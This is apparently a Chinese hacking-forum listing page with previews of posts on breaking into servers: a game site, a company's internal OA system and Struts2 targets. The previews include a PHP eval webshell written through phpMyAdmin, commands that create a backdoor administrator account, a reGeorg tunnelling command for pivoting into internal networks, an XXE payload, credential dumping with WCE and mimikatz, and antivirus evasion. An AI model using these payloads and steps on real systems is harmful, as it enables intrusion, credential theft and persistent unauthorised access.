<form action="http://www.ssports.com/resetpwd.html?val=xxxx" method="post"><textarea name=t cols=120 rows=10 width=45>reset</textarea><BR><center><br><input type="password"...
2021-04-28 /
1003 次浏览 /
核心成员
POST GET PUT自定义发包工具为了渗透测试方便,就写了这个工具默认三种自定义发包方式 POST GET PUT用法:目标 http://www.xxx.com 参数:aspx?id=1?pwd=content-type:响应信息:输入网站,即可获得响应信息,用于单独响应网站,不带参数返回信息:使用参数,即可获得参数返回信息,用于单独响应网站,带参数 fidder的get方法burp的post方法:...
2021-04-16 /
832 次浏览 /
核心成员
reGeorg http隧道内网转发神器这个工具可以看作是reDuh的升级版作为内网转发也是比较不错的把tunnel.aspx上传到webshell返回可以进行内网转发python reGeorgSocksProxy.py -p 9999 -u http://XXX/tunnel.aspx然后使用Proxifier进行代理127.0.0.1:9999socks5就可以了,然后连接内网服务器,输入用户密码即可...
2021-04-15 /
652 次浏览 /
核心成员
如何使用远控维持提权的system权限比如我们拿到一个shell。是匿名权限,远控的前提是system权限,这个时候我们就需要去使用漏洞的exp去执行到system权限比如potato,提权成功率还是比较高的我们来测试这个时候我们已经成功提权到system我们其实可以利用system去做很多事情比如利用wce,就可以读到管理员的密码也可以使用mimikatz_trunk这个时候我们通过wce读到了管理员的hash,也可以使用-w读管理员明文密码这个时候管理员密码就暴露了我们除...
2021-04-14 /
844 次浏览 /
核心成员
XXE实体注入测试工具XXE实体注入如SOAP的wsdl接口,就是使用的XML,我们可以自定义参数以及网站地址用法:www.xxx.comXXE漏洞实体注入参数:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTlTY % remote SYSTEM "/opt">%remote;]>WSDL参数:<?xml...
2021-04-13 /
587 次浏览 /
核心成员
Struts2版本系列漏洞检查工具提权服务器验证过程通过我们编写的Struts2版本系列漏洞检查工具来进行对漏洞的验证该网站存在struts045的漏洞那么我们先获取到whoami的信息发现是系统权限,那么查看开放的端口?我们发现3389是打开的那么我们就可以建立一个用户并加入到管理员组如net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add在命令输入net use...
2021-04-12 /
1117 次浏览 /
核心成员
某奇葩游戏站点服务器过程目标:xxx游戏站发现有phpmyadmin没想到root空口令直接登录这个管理员是真的有多危险接下来就是找网站路径写马运气太好select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'XX'不多说了,直接getshell了发现既然是system权限,那么直接提权吧找终端经过判断,发现了终端直接进服务器嗅探到了几个rdp的东东,不玩了,就到这里本文章只是技术研究,不做任...
2021-04-10 /
632 次浏览 /
核心成员
部分安全行业从业人员自研开源扫描器合集fuzz工具收集https://github.com/ivanfratric/winaflhttps://github.com/attekett/NodeFuzzhttps://github.com/google/oss-fuzzhttp://blog.topsec.com.cn/ad_lab/alphafuzzer/http://llvm.org/docs/LibFuzzer.html子域名枚举https://github.com/li...
2021-04-08 /
673 次浏览 /
核心成员
旁注card查询小助手v1.0https://wws.lanzous.com/idmLBnqd0he密码:5f8u解压密码:fuckml...
2021-04-06 /
627 次浏览 /
核心成员
神器绕过360杀毒提权内网OA系统过程目标:某XX公司内网OA系统发现有360杀毒,wce传上去直接被杀,烂土豆potato也被杀掉,MSF的木马就更不用说了使用免杀神器提权成功,但是发现没有开启3389,又处于内网所以还需要进行3389开启配合cscript.exe进行On Error Resume Nextconst HKEY_LOCAL_MACHINE = &H80000002strComputer = "."Set StdOut = WSc...
2021-03-26 /
2155 次浏览 /
核心成员